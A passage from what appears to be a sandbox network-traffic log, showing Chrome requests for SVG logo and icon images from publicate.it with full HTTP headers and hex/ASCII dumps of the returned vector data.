                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 20 30 2e 33 34 30 38 32 20 63 20 34 2e 35 33 35 35 31 2c 2d 31 32 2e 30 38 35 39 38 20 31 33 2e 30 35 35 39 37 2c 2d 31 37 2e 37 32 32 36 20 32 34 2e 35 33 38 39 36 2c 2d 31 37 2e 37 32 32 36 20 31 31 2e 36 36 36 34 39 2c 30 20 31 38 2e 39 35 34 37 37 2c 35 2e 36 33 36 36 32 20 32 34 2e 31 39 38 31 34 2c 31 37 2e 37 32 32 36 20 34 2e 35 30 39 33 2c 2d 31 32 2e 30 38 35 39 38 20 31 34 2e 37 36 30 30 38 2c 2d 31 37 2e 37 32 32 36 20 32 35 2e 37 34 34 39 35 2c 2d 31 37 2e 37 32 32 36 20 37 2e 38 31 32 36 32 2c 30 20 31 36 2e 33 35 39 33 31 2c 33 2e 32 32 34 36 37 20 32 31 2e 35 37 36 34 36 2c 31 30 2e 34 36 30 35 32 20 35 2e 38 39 38 37 39 2c 38 2e 30 34 38 35 37 20 34 2e 36 39 32 38 31 2c 31 39 2e 37 34 31 32 38 20 34 2e 36 39 32 38 31 2c 32 39 2e 39 39 32
                                                                                                                                                                                                        Data Ascii: 0.34082 c 4.53551,-12.08598 13.05597,-17.7226 24.53896,-17.7226 11.66649,0 18.95477,5.63662 24.19814,17.7226 4.5093,-12.08598 14.76008,-17.7226 25.74495,-17.7226 7.81262,0 16.35931,3.22467 21.57646,10.46052 5.89879,8.04857 4.69281,19.74128 4.69281,29.992
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 32 35 2e 33 37 37 39 20 2d 32 2e 30 39 37 33 35 2c 2d 36 2e 36 35 39 30 36 20 2d 36 2e 32 36 35 38 31 2c 2d 39 2e 32 35 34 35 33 20 2d 31 32 2e 31 39 30 38 33 2c 2d 39 2e 32 35 34 35 33 22 0a 20 20 20 20 20 69 64 3d 22 70 61 74 68 31 36 22 20 2f 3e 0a 20 20 3c 70 61 74 68 0a 20 20 20 20 20 64 3d 22 4d 20 35 34 38 2e 30 30 37 36 32 2c 31 30 35 2e 34 35 34 32 34 20 48 20 35 32 39 2e 34 34 36 31 20 63 20 2d 31 2e 38 36 31 34 31 2c 2d 30 2e 31 33 31 30 37 20 2d 33 2e 33 35 35 37 37 2c 2d 31 2e 36 32 35 34 33 20 2d 33 2e 33 35 35 37 37 2c 2d 33 2e 34 36 30 36 31 20 6c 20 2d 30 2e 30 32 36 32 2c 2d 39 35 2e 36 39 31 34 39 20 63 20 30 2e 31 35 37 33 2c 2d 31 2e 37 35 36 35 33 20 31 2e 37 30 34 31 2c 2d 33 2e 31 31 39 38 20 33 2e 35 39 31 37 31 2c 2d 33 2e 31 31
                                                                                                                                                                                                        Data Ascii: 25.3779 -2.09735,-6.65906 -6.26581,-9.25453 -12.19083,-9.25453" id="path16" /> <path d="M 548.00762,105.45424 H 529.4461 c -1.86141,-0.13107 -3.35577,-1.62543 -3.35577,-3.46061 l -0.0262,-95.69149 c 0.1573,-1.75653 1.7041,-3.1198 3.59171,-3.11
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC812INData Raw: 2e 37 32 36 31 34 31 2c 31 33 2e 35 35 34 30 39 20 2d 31 35 2e 36 37 37 36 38 2c 30 20 2d 32 37 2e 38 39 34 37 31 2c 2d 39 2e 36 37 34 30 31 20 2d 32 37 2e 38 39 34 37 31 2c 2d 32 39 2e 30 34 38 32 34 20 30 2c 2d 31 35 2e 31 32 37 31 33 20 38 2e 32 30 35 38 37 2c 2d 32 35 2e 34 33 30 33 35 20 31 39 2e 38 37 32 33 36 2c 2d 33 30 2e 34 36 33 39 38 20 31 30 2e 31 31 39 37 2c 2d 34 2e 34 35 36 38 38 20 32 34 2e 32 35 30 35 38 2c 2d 35 2e 32 34 33 33 37 20 33 35 2e 30 35 31 39 33 31 2c 2d 36 2e 34 37 35 35 36 20 76 20 2d 32 2e 34 31 31 39 35 20 63 20 30 2c 2d 34 2e 34 33 30 36 36 20 30 2e 33 34 30 38 32 2c 2d 39 2e 36 37 34 30 33 20 2d 32 2e 32 35 34 36 35 2c 2d 31 33 2e 35 30 31 36 37 20 2d 32 2e 32 38 30 38 38 31 2c 2d 33 2e 34 33 34 34 32 20 2d 36 2e 36 33
                                                                                                                                                                                                        Data Ascii: .726141,13.55409 -15.67768,0 -27.89471,-9.67401 -27.89471,-29.04824 0,-15.12713 8.20587,-25.43035 19.87236,-30.46398 10.1197,-4.45688 24.25058,-5.24337 35.051931,-6.47556 v -2.41195 c 0,-4.43066 0.34082,-9.67403 -2.25465,-13.50167 -2.280881,-3.43442 -6.63


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        43192.168.2.549788104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC775OUTGET /images/group-2.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 1796
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "704-620aa1d197084"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GWNkxPknnScaRCMnMZ1JYS8wEA%2FaR4pEzotLjxXKDOdGjSv0EruB%2FQ8FzKdehxCg1YdUEKOKiRipXGZe8udBbtOGVu9ZNJMkrcCbdA%2BuGdFh9z4%2FVitHsH5beIy0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615a87aab43b3-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC618INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 34 33 22 20 68 65 69 67 68 74 3d 22 32 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 34 33 20 32 38 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 67 20 66 69 6c 6c 3d 22 23 46 46 42 39 33 31 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 6d 31 33 2e 35 33 35 20 32 31 2e 32 34 35 2d 35 2e 39 37 20 33 2e 31 33 38 61 31 20 31 20 30 20 30 20 31 2d 31 2e 34 35 31 2d 31 2e 30 35 34 6c 31 2e 31 34 2d 36 2e 36 34 38 61 31 20 31 20 30 20 30 20 30 2d 2e 32 38 38 2d 2e 38 38 35 6c 2d 34 2e 38 33 2d 34 2e 37 30 38 61 31 20 31 20 30 20 30 20 31 20 2e 35 35 34 2d 31 2e 37
                                                                                                                                                                                                        Data Ascii: <svg width="143" height="28" viewBox="0 0 143 28" xmlns="http://www.w3.org/2000/svg"> <g fill="#FFB931" fill-rule="evenodd"> <path d="m13.535 21.245-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.7
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1178INData Raw: 35 2d 36 2e 30 34 38 61 31 20 31 20 30 20 30 20 31 20 31 2e 37 39 34 20 30 6c 32 2e 39 38 35 20 36 2e 30 34 38 61 31 20 31 20 30 20 30 20 30 20 2e 37 35 33 2e 35 34 37 6c 36 2e 36 37 35 2e 39 37 61 31 20 31 20 30 20 30 20 31 20 2e 35 35 34 20 31 2e 37 30 36 6c 2d 34 2e 38 33 20 34 2e 37 30 38 61 31 20 31 20 30 20 30 20 30 2d 2e 32 38 38 2e 38 38 35 6c 31 2e 31 34 20 36 2e 36 34 38 61 31 20 31 20 30 20 30 20 31 2d 31 2e 34 35 20 31 2e 30 35 34 6c 2d 35 2e 39 37 2d 33 2e 31 33 38 61 31 20 31 20 30 20 30 20 30 2d 2e 39 33 31 20 30 7a 4d 37 30 2e 39 33 35 20 32 31 2e 32 34 35 6c 2d 35 2e 39 37 20 33 2e 31 33 38 61 31 20 31 20 30 20 30 20 31 2d 31 2e 34 35 31 2d 31 2e 30 35 34 6c 31 2e 31 34 2d 36 2e 36 34 38 61 31 20 31 20 30 20 30 20 30 2d 2e 32 38 38 2d 2e
                                                                                                                                                                                                        Data Ascii: 5-6.048a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547l6.675.97a1 1 0 0 1 .554 1.706l-4.83 4.708a1 1 0 0 0-.288.885l1.14 6.648a1 1 0 0 1-1.45 1.054l-5.97-3.138a1 1 0 0 0-.931 0zM70.935 21.245l-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        44192.168.2.549794104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC777OUTGET /images/trustedby.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 3391
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "d3f-620aa1d27a932"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FgA1LxN2tgBMKVqec55DkDOq4T0scvDwzg%2Bt8MMWUDSpQQaO2ILfGjHGJUgtN%2B6j%2FnpyMuwYJWcKtzsMgI4fbfJnKoQB1GKkqDBbp5a2FqP%2FShyvNm9bs0vIzFApLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615aa2c0e42fe-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC618INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 39 38 70 78 22 20 68 65 69 67 68 74 3d 22 31 32 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 39 38 20 31 32 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 36 31 20 28 38 39 35 38 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 73 6b 65 74 63 68 2e 63 6f 6d 20 2d 2d 3e 0a 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="298px" height="120px" viewBox="0 0 298 120" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> ... Generator: Sketch 61 (89581) - https://sketch.com -->
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 38 35 31 36 20 33 39 2e 30 38 36 37 33 31 32 2c 39 36 2e 34 38 35 31 36 20 43 37 31 2e 31 34 35 37 34 37 38 2c 39 36 2e 34 38 35 31 36 20 37 33 2e 32 30 30 38 34 36 39 2c 37 35 2e 33 36 36 38 39 37 35 20 37 33 2e 32 30 30 38 34 36 39 2c 37 35 2e 33 36 36 38 39 37 35 20 4c 35 37 2e 36 36 36 37 34 30 38 2c 37 35 2e 33 36 36 38 39 37 35 20 43 35 37 2e 36 36 36 37 34 30 38 2c 37 35 2e 33 36 36 38 39 37 35 20 35 34 2e 33 33 36 30 39 38 32 2c 38 36 2e 37 33 38 32 37 30 31 20 33 38 2e 31 33 39 31 31 37 2c 38 36 2e 37 33 38 32 37 30 31 20 43 32 34 2e 39 34 37 31 31 38 33 2c 38 36 2e 37 33 38 32 37 30 31 20 31 35 2e 34 35 38 39 31 35 37 2c 37 37 2e 38 32 36 36 38 38 33 20 31 35 2e 34 35 38 39 31 35 37 2c 36 35 2e 33 33 35 38 30 39 39 20 4c 37 34 2e 38 32 35 33 32
                                                                                                                                                                                                        Data Ascii: 8516 39.0867312,96.48516 C71.1457478,96.48516 73.2008469,75.3668975 73.2008469,75.3668975 L57.6667408,75.3668975 C57.6667408,75.3668975 54.3360982,86.7382701 38.139117,86.7382701 C24.9471183,86.7382701 15.4589157,77.8266883 15.4589157,65.3358099 L74.82532
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 43 38 39 2e 39 37 36 31 33 38 38 2c 34 39 2e 31 37 31 31 34 35 35 20 39 37 2e 33 32 39 33 31 31 34 2c 33 36 2e 35 34 38 35 35 33 37 20 31 31 33 2e 32 36 30 33 37 34 2c 33 36 2e 35 34 38 35 35 33 37 20 5a 22 20 69 64 3d 22 62 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 39 2e 30 36 39 35 32 31 2c 32 36 2e 30 39 30 39 35 33 34 20 43 31 35 37 2e 35 32 30 32 38 31 2c 32 36 2e 30 39 30 39 35 33 34 20 31 35 35 2e 34 39 36 39 30 32 2c 34 33 2e 33 36 35 37 37 32 36 20 31 35 35 2e 34 39 36 39 30 32 2c 34 36 2e 31 32 36 32 32 37 38 20 4c 31 37 31 2e 32 30 30 32 32 31 2c 34 36 2e 31 32 36 32 32 37 38 20 43 31 37 31 2e 32 30 30 32 32 31 2c 34 36 2e 31 32 36 32 32 37 38 20 31 37 32 2e 30 32 33 36 39 39 2c 33 36
                                                                                                                                                                                                        Data Ascii: C89.9761388,49.1711455 97.3293114,36.5485537 113.260374,36.5485537 Z" id="b"></path> <path d="M189.069521,26.0909534 C157.520281,26.0909534 155.496902,43.3657726 155.496902,46.1262278 L171.200221,46.1262278 C171.200221,46.1262278 172.023699,36
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC35INData Raw: 6c 79 67 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 3c 2f 67 3e 0a 3c 2f 73 76 67 3e
                                                                                                                                                                                                        Data Ascii: lygon> </g> </g></svg>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        45192.168.2.549792104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC776OUTGET /images/download.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC754INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 6924
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "1b0c-620aa1d153a60"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ahmptgW7RblOQPU80Al%2FmyzokGNMdxw5urqvnCMsSqolE1%2BkpHcrf0U8TuR39T4FoQ%2FXr9K57Yshobjh6A9XclNXzEVHjG8vEz%2BBgcdExJTiqm1l%2BdMK6co6o8L4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615aa2a5b43ca-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC615INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 32 22 20 68 65 69 67 68 74 3d 22 32 37 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 32 20 32 37 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 67 20 66 69 6c 6c 3d 22 23 46 46 46 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 6d 30 20 39 2e 39 31 33 20 31 31 2e 31 38 31 2e 30 30 32 20 36 2e 38 2e 30 30 31 56 33 2e 31 38 31 7a 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 37 2e 39 38 20 33 2e 31 38 76 32 33 2e 37 38 31 4c 32 36 2e 34 37 32 20 30 7a 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 37 2e 39 38 20 39
                                                                                                                                                                                                        Data Ascii: <svg width="122" height="27" viewBox="0 0 122 27" xmlns="http://www.w3.org/2000/svg"> <g fill="#FFF" fill-rule="nonzero"> <path d="m0 9.913 11.181.002 6.8.001V3.181z"/> <path d="M17.98 3.18v23.781L26.472 0z"/> <path d="M17.98 9
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 2e 39 37 34 20 31 2e 34 34 2d 32 2e 37 34 36 61 36 2e 36 32 31 20 36 2e 36 32 31 20 30 20 30 20 31 20 32 2e 34 30 32 2d 31 2e 38 31 63 2e 39 36 2d 2e 34 33 35 20 32 2e 30 39 2d 2e 36 35 33 20 33 2e 33 38 37 2d 2e 36 35 33 2e 36 34 20 30 20 31 2e 32 31 39 2e 30 35 38 20 31 2e 37 33 36 2e 31 37 32 2e 35 31 37 2e 31 31 35 2e 39 36 38 2e 32 35 31 20 31 2e 33 35 35 2e 34 30 37 2e 33 38 35 2e 31 35 36 2e 37 30 35 2e 33 32 2e 39 36 2e 34 39 32 2e 32 35 34 2e 31 37 33 2e 34 34 37 2e 33 31 37 2e 35 37 39 2e 34 33 31 2e 31 34 38 2e 31 33 32 2e 32 37 35 2e 32 38 38 2e 33 38 32 2e 34 36 38 2e 31 30 36 2e 31 38 31 2e 31 36 2e 33 37 38 2e 31 36 2e 35 39 31 20 30 20 2e 33 32 39 2d 2e 31 32 34 2e 36 35 37 2d 2e 33 37 2e 39 38 36 61 37 2e 31 32 20 37 2e 31 32 20 30 20 30
                                                                                                                                                                                                        Data Ascii: .974 1.44-2.746a6.621 6.621 0 0 1 2.402-1.81c.96-.435 2.09-.653 3.387-.653.64 0 1.219.058 1.736.172.517.115.968.251 1.355.407.385.156.705.32.96.492.254.173.447.317.579.431.148.132.275.288.382.468.106.181.16.378.16.591 0 .329-.124.657-.37.986a7.12 7.12 0 0
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 2e 37 39 33 61 33 2e 36 33 33 20 33 2e 36 33 33 20 30 20 30 20 31 2d 2e 35 35 38 2d 2e 39 33 63 2d 2e 31 34 2d 2e 33 33 38 2d 2e 32 31 2d 2e 35 39 2d 2e 32 31 2d 2e 37 35 35 20 30 2d 2e 32 33 31 2e 31 32 38 2d 2e 34 35 34 2e 33 38 34 2d 2e 36 36 39 2e 32 35 36 2d 2e 32 31 34 2e 36 30 37 2d 2e 34 30 39 20 31 2e 30 35 33 2d 2e 35 38 32 61 38 2e 35 38 33 20 38 2e 35 38 33 20 30 20 30 20 31 20 31 2e 35 33 36 2d 2e 34 32 31 63 2e 35 37 38 2d 2e 31 30 38 20 31 2e 31 39 2d 2e 31 36 31 20 31 2e 38 33 34 2d 2e 31 36 31 2e 38 39 31 20 30 20 31 2e 36 34 37 2e 30 39 20 32 2e 32 36 37 2e 32 37 32 2e 36 31 39 2e 31 38 32 20 31 2e 31 32 33 2e 34 36 33 20 31 2e 35 31 31 2e 38 34 32 61 33 2e 32 20 33 2e 32 20 30 20 30 20 31 20 2e 38 33 20 31 2e 34 32 35 63 2e 31 36 35 2e
                                                                                                                                                                                                        Data Ascii: .793a3.633 3.633 0 0 1-.558-.93c-.14-.338-.21-.59-.21-.755 0-.231.128-.454.384-.669.256-.214.607-.409 1.053-.582a8.583 8.583 0 0 1 1.536-.421c.578-.108 1.19-.161 1.834-.161.891 0 1.647.09 2.267.272.619.182 1.123.463 1.511.842a3.2 3.2 0 0 1 .83 1.425c.165.
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 35 38 37 2e 35 39 31 2d 32 2e 37 37 36 7a 6d 36 2e 31 32 20 34 2e 32 36 32 61 34 2e 33 30 37 20 34 2e 33 30 37 20 30 20 30 20 31 2d 2e 32 32 34 2d 31 2e 30 34 31 20 31 31 2e 39 35 20 31 31 2e 39 35 20 30 20 30 20 31 2d 2e 30 35 2d 31 2e 30 39 56 36 2e 32 37 36 63 2e 31 31 36 2d 2e 30 31 37 2e 32 34 2d 2e 30 33 33 2e 33 37 33 2d 2e 30 35 2e 31 31 35 2d 2e 30 31 36 2e 32 33 39 2d 2e 30 32 39 2e 33 37 31 2d 2e 30 33 37 2e 31 33 32 2d 2e 30 30 38 2e 32 36 34 2d 2e 30 31 33 2e 33 39 36 2d 2e 30 31 33 2e 32 36 35 20 30 20 2e 35 33 2e 30 32 35 2e 37 39 33 2e 30 37 35 2e 32 36 34 2e 30 35 2e 35 30 34 2e 31 34 38 2e 37 32 2e 32 39 37 2e 32 31 34 2e 31 34 39 2e 33 38 37 2e 33 35 31 2e 35 32 2e 36 30 37 2e 31 33 31 2e 32 35 36 2e 31 39 37 2e 35 39 2e 31 39 37 20 31
                                                                                                                                                                                                        Data Ascii: 587.591-2.776zm6.12 4.262a4.307 4.307 0 0 1-.224-1.041 11.95 11.95 0 0 1-.05-1.09V6.276c.116-.017.24-.033.373-.05.115-.016.239-.029.371-.037.132-.008.264-.013.396-.013.265 0 .53.025.793.075.264.05.504.148.72.297.214.149.387.351.52.607.131.256.197.59.197 1
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 38 31 20 30 2d 31 2e 32 32 35 2e 32 33 35 2d 31 2e 36 33 32 2e 37 30 36 2d 2e 34 30 37 2e 34 37 31 2d 2e 36 31 20 31 2e 31 32 38 2d 2e 36 31 20 31 2e 39 37 68 34 2e 33 36 7a 6d 38 2e 39 31 32 2d 33 2e 34 33 63 2e 30 39 39 2d 2e 31 34 38 2e 32 33 2d 2e 33 31 32 2e 33 39 36 2d 2e 34 39 33 2e 31 36 35 2d 2e 31 38 2e 33 36 38 2d 2e 33 34 34 2e 36 30 37 2d 2e 34 39 31 2e 32 34 2d 2e 31 34 38 2e 35 30 34 2d 2e 32 37 2e 37 39 33 2d 2e 33 37 2e 32 38 39 2d 2e 30 39 37 2e 35 39 39 2d 2e 31 34 37 2e 39 33 2d 2e 31 34 37 2e 31 39 37 20 30 20 2e 34 30 38 2e 30 31 37 2e 36 33 31 2e 30 35 2e 32 32 33 2e 30 33 33 2e 34 33 2e 30 39 34 2e 36 32 2e 31 38 34 73 2e 33 34 32 2e 32 31 33 2e 34 35 38 2e 33 36 38 61 2e 39 34 33 2e 39 34 33 20 30 20 30 20 31 20 2e 31 37 33 2e 35
                                                                                                                                                                                                        Data Ascii: 81 0-1.225.235-1.632.706-.407.471-.61 1.128-.61 1.97h4.36zm8.912-3.43c.099-.148.23-.312.396-.493.165-.18.368-.344.607-.491.24-.148.504-.27.793-.37.289-.097.599-.147.93-.147.197 0 .408.017.631.05.223.033.43.094.62.184s.342.213.458.368a.943.943 0 0 1 .173.5
